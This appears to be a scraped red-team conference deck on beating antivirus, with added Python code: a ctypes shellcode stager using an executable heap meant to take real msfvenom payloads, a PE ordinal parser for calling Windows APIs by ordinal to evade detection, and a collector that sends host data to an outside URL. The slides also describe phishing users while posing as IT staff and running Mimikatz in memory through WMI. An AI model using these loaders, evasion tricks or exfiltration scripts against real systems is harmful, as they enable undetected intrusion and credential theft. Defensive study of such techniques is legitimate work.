A Battle Against the Industry - Beating Antivirus for Meterpreter and More
![Page 1: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/1.jpg)
A Battle Against the Industry - Beating Antivirus for Meterpreter and More
@ChrisTruncer
![Page 2: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/2.jpg)
Whoami
■ A systems administrator turned red teamer
■ Florida State Seminole
■ Open Source Software Developer
■ Veil-Framework
■ EyeWitness
■ Egress-Assess
■ Just-Metadata
Thanks Robin :)
![Page 3: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/3.jpg)
Why am I here today?
■ Share some laughs at Antivirus :)
■ Give a background on stagers
■ Showcase a Veil-Evasion signature bypass
■ Anyone can do this..
■ Talk about developing your own code
■ Case studies on previously developed code
![Page 4: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/4.jpg)
Stagers
![Page 5: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/5.jpg)
What are stagers?
■ Can be referred to as “stage 1”
■ Might be msfvenom, Veil-Evasion, etc. output
■ Goal is typically to inject shellcode into memory
■ Shellcode usually downloads and executes a reflectively injectable dll
■ …but it can also do anything you want if you write it :)
![Page 6: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/6.jpg)
What are stagers?
■ Stagers are really used as loaders for your real malware
■ They’re designed to be expendable and tiny
■ Don’t give away your engineered malware by dropping it to disk
■ Load everything in memory
![Page 7: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/7.jpg)
What are stagers?
■ Any language that has the ability to access Windows functions can be used to write a stager!
■ Pretty cool, and allows us to expand out from traditional “Windows Languages”
■ Interacting with Windows functions can seem daunting, but isn’t all that bad
■ 4 or 5 function calls
![Page 8: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/8.jpg)
Function Calls
![Page 9: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/9.jpg)
Stagers in a Nutshell
■ Allocate memory to store the shellcode being injected, and apply proper memory permissions
■ Copy the shellcode into the allocated memory
■ Create a thread to run the shellcode copied into the process’s memory
■ Wait for the thread to complete running before exiting the program
![Page 10: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/10.jpg)
Windows API Calls
■Most stagers utilize VirtualAlloc to allocate memory
■This talk shows an alternate way to allocate memory that isn’t heavily utilized
■It might be a better way to fly under the radar
![Page 11: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/11.jpg)
HeapCreate
■ Creates a private heap object that can be used by the process creating the heap
■ Specify the heap options: HEAP_CREATE_ENABLE_EXECUTE makes every block allocated from the heap executable, so the copied shellcode can run without a separate VirtualProtect call
■ Requires the size of the heap that will need to be allocated
■ Shellcode length
■ Max size of allocated memory
■ I do twice the shellcode length
![Page 12: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/12.jpg)
HeapAlloc
■ Allocates memory from the previously created heap object
■ Receives a handle to the previously allocated heap object
■ Specify the total amount of space that you are allocating for shellcode
![Page 13: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/13.jpg)
RtlMoveMemory
■ Places the shellcode you are injecting into the allocated heap space
■ Needs a pointer to where data (shellcode) will be copied to (HeapAlloc output)
■ Needs a pointer to the data (shellcode)
■ Needs the length of the shellcode being injected
![Page 14: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/14.jpg)
CreateThread
■This function creates a new thread within the current process to execute the data (shellcode) that was injected
■Requires a pointer to the data (shellcode) that will run in the new thread
■Schedule the thread to execute immediately
![Page 15: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/15.jpg)
WaitForSingleObject
■ This function is a blocking call that prevents the program from exiting immediately
■ Requires a handle to the thread that was created by the CreateThread function
■ Requires a timeout value of -1 (INFINITE) to specify that the program should wait to exit until the thread exits
![Page 16: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/16.jpg)
Stagers in a Nutshell (Repeated)
■ Allocate memory to store the shellcode being injected, and apply proper memory permissions
■ Copy the shellcode into the allocated memory
■ Create a thread to run the shellcode copied into the process’s memory
■ Wait for the thread to complete running before exiting the program
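The five calls walked through on the HeapCreate, HeapAlloc, RtlMoveMemory, CreateThread and WaitForSingleObject slides, written out as a Python ctypes stager. This is an added example, not code from the slides or from Veil-Evasion: the shellcode is embedded the way msfvenom emits it (a C-style `"\xNN"` string) and parsed back to bytes, and the default payload is a constructed single `ret` instruction (0xC3) so the injected thread just returns, which keeps the script harmless while still exercising every call. The injection itself only runs on Windows; the parser and size helper run anywhere.

```python
import ctypes
import re
import sys

# Constructed sample payload: a single x86/x64 `ret` (0xC3), so the new thread
# returns immediately. Replace with real msfvenom/Veil output to use for real.
SAMPLE_SHELLCODE_C_STRING = 'unsigned char buf[] =\n"\\xc3";'

HEAP_CREATE_ENABLE_EXECUTE = 0x00040000  # blocks from this heap may be executed
HEAP_ZERO_MEMORY = 0x00000008
INFINITE = 0xFFFFFFFF                    # the "-1" on the WaitForSingleObject slide


def parse_c_shellcode(text: str) -> bytes:
    """Turn msfvenom's C-format output (\\xNN escapes, possibly split over
    several quoted lines with an 'unsigned char buf[] =' prefix) into bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


def heap_sizes(shellcode: bytes) -> tuple:
    """(initial, maximum) heap size: shellcode length and twice that, as in the talk."""
    return len(shellcode), 2 * len(shellcode)


def run_shellcode(shellcode: bytes) -> int:
    """HeapCreate -> HeapAlloc -> RtlMoveMemory -> CreateThread -> WaitForSingleObject.
    Returns the WaitForSingleObject result: 0 (WAIT_OBJECT_0) once the thread has exited."""
    if sys.platform != "win32":
        raise OSError("Windows only: needs kernel32.dll")
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    # Prototype every call so handles/pointers are not truncated to 32-bit ints on x64.
    k32.HeapCreate.restype = ctypes.c_void_p
    k32.HeapCreate.argtypes = [ctypes.c_uint32, ctypes.c_size_t, ctypes.c_size_t]
    k32.HeapAlloc.restype = ctypes.c_void_p
    k32.HeapAlloc.argtypes = [ctypes.c_void_p, ctypes.c_uint32, ctypes.c_size_t]
    k32.RtlMoveMemory.restype = None
    k32.RtlMoveMemory.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t]
    k32.CreateThread.restype = ctypes.c_void_p
    k32.CreateThread.argtypes = [ctypes.c_void_p, ctypes.c_size_t, ctypes.c_void_p,
                                 ctypes.c_void_p, ctypes.c_uint32, ctypes.c_void_p]
    k32.WaitForSingleObject.restype = ctypes.c_uint32
    k32.WaitForSingleObject.argtypes = [ctypes.c_void_p, ctypes.c_uint32]

    initial, maximum = heap_sizes(shellcode)
    # 1. Private executable heap (no VirtualAlloc, no VirtualProtect).
    heap = k32.HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, initial, maximum)
    if not heap:
        raise ctypes.WinError(ctypes.get_last_error())
    # 2. Block inside that heap large enough for the shellcode.
    buf = k32.HeapAlloc(heap, HEAP_ZERO_MEMORY, len(shellcode))
    if not buf:
        raise ctypes.WinError(ctypes.get_last_error())
    # 3. Copy the bytes in (a bytes object is passed as a pointer to its buffer).
    k32.RtlMoveMemory(buf, shellcode, len(shellcode))
    # 4. New thread whose start address is the heap block; flags 0 = run now.
    thread = k32.CreateThread(None, 0, buf, None, 0, None)
    if not thread:
        raise ctypes.WinError(ctypes.get_last_error())
    # 5. Block until the thread (and so the shellcode) has finished.
    return k32.WaitForSingleObject(thread, INFINITE)


if __name__ == "__main__":
    sc = parse_c_shellcode(SAMPLE_SHELLCODE_C_STRING)
    print("shellcode:", sc.hex(), "heap (initial, max):", heap_sizes(sc))
    if sys.platform == "win32":
        print("WaitForSingleObject returned", run_shellcode(sc))
```

With the `ret` payload, WaitForSingleObject comes back with 0 almost immediately; with a real stage-1 payload the call blocks for as long as the shellcode's thread lives, which is exactly the "wait for the thread before exiting" step the slides describe. The explicit `argtypes`/`restype` prototypes matter on 64-bit Python: without them ctypes treats the heap and thread handles as C `int` and silently truncates them.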
![Page 17: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/17.jpg)
![Page 18: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/18.jpg)
Ordinal Values
![Page 19: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/19.jpg)
Ordinal Values
■ Using ordinal values to reference functions is an old-school but effective way to bypass antivirus detection
■Picture an array or Python list containing functions. To reference a specific function, you reference it by its location within the array/list
■Same concept for bypassing AV via ordinal values
![Page 20: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/20.jpg)
Ordinal Values
■ Rather than calling HeapAlloc or RtlMoveMemory by name, why not reference it by its ordinal value?
■ This is still a call to the same function, but just via a different method
■Check out this code
![Page 21: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/21.jpg)
![Page 22: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/22.jpg)
![Page 23: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/23.jpg)
![Page 24: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/24.jpg)
Ordinal Values
■ Simply referencing function calls by their ordinal value vs. name can bypass anti-virus
■ NOTE: Ordinal values can change between both OSs and Service Packs. You will need to target your payload to the OS and Service Pack when referencing via ordinal value.
■ So…. how do we find these ordinal values?
![Page 25: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/25.jpg)
![Page 26: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/26.jpg)
Ordinal Values
■PEView is a free program which lets you inspect PE files, dlls, etc.
■You can use this to load kernel32.dll, search for the functions that you are calling, and obtain their ordinal value
■PEView provides the base 16 value, so be sure to convert it to its base 10 value.
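The PEView lookup on the last few slides can be scripted: the ordinal of a named export is the export directory's `Base` plus that name's entry in `AddressOfNameOrdinals`. The block below is an added example, not part of the talk or of Veil-Evasion. It walks a DLL's export table in pure Python (no `pefile`), prints each ordinal in both hex and decimal since PEView shows hex, and shows how ctypes calls a function by ordinal (`WinDLL(...)[ordinal]`, which is GetProcAddress with an ordinal instead of a name). The sample DLL image is constructed inside the block so it runs offline; on Windows it also parses the real kernel32.dll (path assumed via `%SystemRoot%`) and sanity-checks an ordinal call against `os.getpid()`.

```python
import ctypes
import os
import struct
import sys


def _u16(b, o): return struct.unpack_from("<H", b, o)[0]
def _u32(b, o): return struct.unpack_from("<I", b, o)[0]


def export_ordinals(image: bytes) -> dict:
    """Return {export_name: ordinal} for a PE file's export table.
    ordinal = export directory Base + AddressOfNameOrdinals[i] for name i."""
    if image[:2] != b"MZ":
        raise ValueError("not a PE file (no MZ header)")
    pe = _u32(image, 0x3C)                         # e_lfanew
    if image[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    n_sections = _u16(image, pe + 6)
    opt = pe + 24                                  # optional header follows the 20-byte COFF header
    magic = _u16(image, opt)
    dd = opt + (112 if magic == 0x20B else 96)     # data directory offset: PE32+ vs PE32
    exp_rva = _u32(image, dd)                      # DataDirectory[0] = export table
    if exp_rva == 0:
        return {}
    sec = opt + _u16(image, pe + 20)               # section table follows the optional header
    sections = []
    for i in range(n_sections):
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", image, sec + 40 * i + 8)
        sections.append((va, max(vsize, rawsize), rawptr))

    def off(rva):                                  # RVA -> file offset via the section table
        for va, size, rawptr in sections:
            if va <= rva < va + size:
                return rva - va + rawptr
        return rva                                 # inside the headers: offset == RVA

    e = off(exp_rva)
    base = _u32(image, e + 16)
    n_names = _u32(image, e + 24)
    names = off(_u32(image, e + 32))
    name_ords = off(_u32(image, e + 36))
    result = {}
    for i in range(n_names):
        name_off = off(_u32(image, names + 4 * i))
        name = image[name_off:image.index(b"\0", name_off)].decode("ascii")
        result[name] = base + _u16(image, name_ords + 2 * i)
    return result


def by_ordinal(dll_name: str, ordinal: int):
    """ctypes treats an integer index as an ordinal, so the function name never appears."""
    return ctypes.WinDLL(dll_name)[ordinal]


def build_sample_dll(names, base=1) -> bytes:
    """Constructed minimal PE32+ image with one section holding an export table for
    `names` (ordinals base, base+1, ...), so the parser can run without a real DLL."""
    sec_va, sec_raw, n = 0x1000, 0x400, len(names)
    funcs_rva = sec_va + 40                        # arrays follow the 40-byte export directory
    names_rva = funcs_rva + 4 * n
    ords_rva = names_rva + 4 * n
    str_rva = ords_rva + 2 * n
    strings, str_rvas = b"", []
    for nm in names:
        str_rvas.append(str_rva + len(strings))
        strings += nm.encode() + b"\0"
    export = struct.pack("<IIHHIIIIIII", 0, 0, 0, 0, 0, base, n, n, funcs_rva, names_rva, ords_rva)
    export += b"".join(struct.pack("<I", 0x2000 + 16 * i) for i in range(n))  # dummy code RVAs
    export += b"".join(struct.pack("<I", r) for r in str_rvas)
    export += b"".join(struct.pack("<H", i) for i in range(n))               # unbiased ordinals
    export += strings
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                       # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, 0x2022)
    opt = struct.pack("<H", 0x20B) + b"\0" * 106 + struct.pack("<I", 16)      # NumberOfRvaAndSizes
    opt += struct.pack("<II", sec_va, len(export)) + b"\0" * (8 * 15)         # export dir entry
    section = b".edata\0\0" + struct.pack("<IIII", len(export), sec_va, len(export), sec_raw) + b"\0" * 16
    headers = dos + coff + opt + section
    return headers + b"\0" * (sec_raw - len(headers)) + export


if __name__ == "__main__":
    wanted = ["CreateThread", "HeapAlloc", "HeapCreate", "RtlMoveMemory", "WaitForSingleObject"]
    for name, o in export_ordinals(build_sample_dll(wanted)).items():
        print(f"{name:<22} ordinal {o:#x} (hex) = {o} (decimal)")
    if sys.platform == "win32":
        k32_path = os.path.join(os.environ["SystemRoot"], "System32", "kernel32.dll")
        with open(k32_path, "rb") as f:
            ords = export_ordinals(f.read())
        print({n: ords[n] for n in wanted})
        # Call GetCurrentProcessId through its ordinal and compare with os.getpid().
        print("pid via ordinal:", by_ordinal("kernel32", ords["GetCurrentProcessId"])(), "==", os.getpid())
```

Two caveats that follow from the slide's note about ordinals changing: parse the kernel32.dll of the exact build you are targeting, and of the matching bitness (a 32-bit Python on 64-bit Windows loads the SysWOW64 copy, whose ordinals differ from the System32 one), otherwise the ordinal resolves to a different function and the stager crashes instead of running.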
![Page 27: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/27.jpg)
Veil’s Approach
![Page 28: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/28.jpg)
How Veil-Evasion Bypasses AV
■ Completely open sourced
■ Can query VT’s API
■ Veil-Evasion attempts to bypass AV through a few different techniques
■ Obfuscated Code
■ Encrypted Code
■ Non-standard languages for binaries
Flat vs. encrypted code
![Page 29: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/29.jpg)
How Veil-Evasion Bypasses AV
■ Languages that Veil-Evasion supports
■ Python
■ Perl
■ PowerShell
■ C#
■ C
■ Go
■ Ruby
![Page 30: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/30.jpg)
How Veil-Evasion Bypasses AV
■Using a non-standard language (read not C, C++, or C#) resulted in payloads that immediately bypassed antivirus
■AV just didn’t understand how to properly inspect these executables
■Example:
■C Flat vs. Python Flat
![Page 31: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/31.jpg)
![Page 32: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/32.jpg)
![Page 33: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/33.jpg)
How Veil-Evasion Bypasses AV
■ Simply changing the language the payload was written in completely bypassed all AV signatures.
![Page 34: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/34.jpg)
Antivirus Signature
![Page 35: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/35.jpg)
Veil-Evasion
■After about 1 year, Veil-Evasion finally had its first signature!
■I was informed about this on IRC and wanted to check it out.
![Page 36: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/36.jpg)
![Page 37: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/37.jpg)
![Page 38: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/38.jpg)
![Page 39: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/39.jpg)
![Page 40: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/40.jpg)
![Page 41: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/41.jpg)
![Page 42: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/42.jpg)
![Page 43: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/43.jpg)
Custom Code
![Page 44: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/44.jpg)
Browser Check Scenario
■ Instead of sending just some random executable when phishing, what if you promise to secure their system?
■ Developed by Hunter Hardman (@t3ntman)
■ Written in C#
■ Custom code, so it bypasses every single AV out there (at least before Hunter made it public :))
![Page 45: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/45.jpg)
![Page 46: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/46.jpg)
Browser Check Scenario
■ This works great for phishing scenarios
■ We target individuals impersonating their IT Security, or just IT staff
■ Warn them about the dangers of misconfigured/old browsers
■ Give them a solution!
![Page 47: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/47.jpg)
Browser Check Scenario
■ Once the program starts, it spawns PowerShell and executes any code you give it
■ Meterpreter or Beacon!
■ It’s fully functional; once the user tells it to start, they see a progress bar go to completion.
■ Once complete, it lets them know their system is secure!
![Page 48: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/48.jpg)
Browser Check Scenario
■ Delivery is dependent upon the situation
■ We’ve created websites hosting it over HTTPS to make users think it is secure
■ Created fake “secure file transfer” websites
■ Rarely, we’ve sent just the executable
■ For our initial access, this has been pretty successful, and the lack of AV detection helps the user trust the program
![Page 49: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/49.jpg)
Browser Check Scenario
■Currently available for review at -https://github.com/t3ntman/BrowserCheck
![Page 50: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/50.jpg)
Enumerator
![Page 51: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/51.jpg)
Enumerator
■ Customer didn’t want actual shellcode injection or infection of their endpoints
■ Wanted intel collection to act as proof of “compromise”
■ I developed a script that would gather host information and POST the data out over HTTPS to our server.
![Page 52: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/52.jpg)
Enumerator
■ Information gathered
■ System hostname
■ IP address(es)
■ System drives and drive space
■ Current user
■ Tasklist
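A standard-library-only version of the collector described on the two Enumerator slides, written for this page as an added example; it is not the enumeration.py / enum_server.py linked on the Github slide. It gathers the listed items (hostname, IPs, drives with free space, current user, tasklist) into a JSON document and POSTs it over HTTPS. The collection step is separated from the sending step so the output can be inspected before anything leaves the host, and the collection URL is an assumption to be replaced with your own listener.

```python
import getpass
import json
import os
import platform
import shutil
import socket
import ssl
import subprocess
import sys
import urllib.request


def drives() -> dict:
    """Drive letters (Windows) or the root mount (elsewhere) with total/free bytes."""
    if os.name == "nt":
        roots = [f"{c}:\\" for c in "ABCDEFGHIJKLMNOPQRSTUVWXYZ" if os.path.exists(f"{c}:\\")]
    else:
        roots = ["/"]
    out = {}
    for root in roots:
        try:
            usage = shutil.disk_usage(root)
            out[root] = {"total": usage.total, "free": usage.free}
        except OSError:
            pass                                    # e.g. an empty optical drive
    return out


def ip_addresses() -> list:
    """Every address the hostname resolves to, deduplicated; no third-party modules."""
    try:
        infos = socket.getaddrinfo(socket.gethostname(), None)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def tasklist() -> str:
    """Running processes as text: `tasklist` on Windows, `ps` elsewhere."""
    cmd = ["tasklist"] if os.name == "nt" else ["ps", "-eo", "pid,user,comm"]
    try:
        return subprocess.run(cmd, capture_output=True, text=True, timeout=30).stdout.strip()
    except (OSError, subprocess.SubprocessError) as exc:
        return f"unavailable: {exc}"


def collect() -> dict:
    """Everything the slide lists, as a JSON-serialisable dict."""
    return {
        "hostname": socket.gethostname(),
        "ips": ip_addresses(),
        "drives": drives(),
        "user": getpass.getuser(),
        "os": platform.platform(),
        "tasklist": tasklist(),
    }


def build_request(data: dict, url: str) -> urllib.request.Request:
    """HTTPS POST carrying the JSON body; built separately so it can be inspected."""
    return urllib.request.Request(
        url, data=json.dumps(data).encode(), method="POST",
        headers={"Content-Type": "application/json", "User-Agent": "Mozilla/5.0"})


def send(data: dict, url: str, verify_tls: bool = True) -> int:
    """POST the collected data and return the HTTP status code.
    verify_tls=False is what you need against a self-signed team-server cert."""
    ctx = ssl.create_default_context()
    if not verify_tls:
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    with urllib.request.urlopen(build_request(data, url), context=ctx, timeout=30) as resp:
        return resp.status


if __name__ == "__main__":
    # Assumed collection endpoint; pass your own listener URL as the first argument.
    target = sys.argv[1] if len(sys.argv) > 1 else "https://collector.example/upload"
    info = collect()
    print(json.dumps({k: v for k, v in info.items() if k != "tasklist"}, indent=2))
    if len(sys.argv) > 1:
        print("POST ->", send(info, target, verify_tls=False))
```

Run without arguments it only prints what would be sent, which is the mode you want when showing a customer exactly what the "proof of compromise" contains; with a URL it posts the full document, tasklist included.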
![Page 53: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/53.jpg)
![Page 54: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/54.jpg)
![Page 55: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/55.jpg)
Github
■https://github.com/ChrisTruncer/PenTestScripts/blob/master/enumeration.py
■https://github.com/ChrisTruncer/PenTestScripts/blob/master/enum_server.py
![Page 56: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/56.jpg)
WMIOps
![Page 57: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/57.jpg)
WMIOps
■Why waste engineering time, developing a RAT, hoping it never gets burnt. Just leverage built in functionality!
■Anything useful for system administration is just as easily repurposed for illegitimate use :)
■Just live off the land!
![Page 58: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/58.jpg)
WMIOps
■ Used WMI much?
■ WMI is installed and running by default on Windows systems since Windows 2000
■ It does require local admin privileges on the targeted system
■ But this can make it great for post-exploitation
![Page 59: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/59.jpg)
WMIOps
■ WMIOps - A PowerShell based tool which uses WMI to carry out various actions on targeted systems.
■ Developed in PowerShell - we can load it in memory and execute a variety of different tasks
![Page 60: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/60.jpg)
WMIOps
■ Want to see which users have active processes on a system?
■Might be good to know where you can snag creds!
■Rather than needing to compromise the machine, just run a simple WMI query with WMIOps!
![Page 61: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/61.jpg)
![Page 62: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/62.jpg)
WMIOps
■Now that we know who is on the system, want to run Mimikatz to capture user credentials?
■Traditionally we’d have to compromise it, and load up Mimikatz.
■Why not leverage WMI to do everything in memory without needing the use of a RAT?
![Page 63: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/63.jpg)
WMIOps
■ Invoke-RemoteScriptWithOutput
■ Spawn PowerShell on the remote system
■ Download the PowerShell script in memory
■ Runs the user specified function
■ Saves output
■ Performs a POST over HTTPS to a user specified IP address
![Page 64: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/64.jpg)
